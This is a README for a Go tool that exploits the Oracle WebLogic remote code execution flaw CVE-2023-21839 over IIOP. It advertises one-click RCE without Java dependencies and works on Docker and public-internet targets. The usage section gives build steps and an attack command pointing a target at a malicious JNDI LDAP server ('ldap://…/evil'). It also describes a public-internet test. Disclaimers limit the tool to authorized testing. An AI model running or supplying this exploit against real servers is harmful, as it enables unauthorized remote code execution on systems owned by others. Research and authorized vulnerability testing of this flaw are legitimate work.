Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

CVE-2023-21839

未经授权许可使用本项目攻击或测试目标是非法的，本程序应仅用于授权的安全测试与研究目的

介绍

Weblogic CVE-2023-21839 RCE

（1）无需任何 Java 依赖，构造协议通过socket直接RCE

（2）已解决 IIOP 的 NAT 网络问题（可测试 Docker 与公网目标）

（3）在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过

（4）请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server

使用

你可以通过 vulhub 复现：链接

Linux/Mac OS

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

如果发现 panic 或有其他报错，说明目标不存在漏洞（或关闭了 IIOP 功能）

本地测试：

某师傅公网测试：

免责声明

此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！

如果使用者使用该工具出现任何非法攻击等违法行为，与作者无关！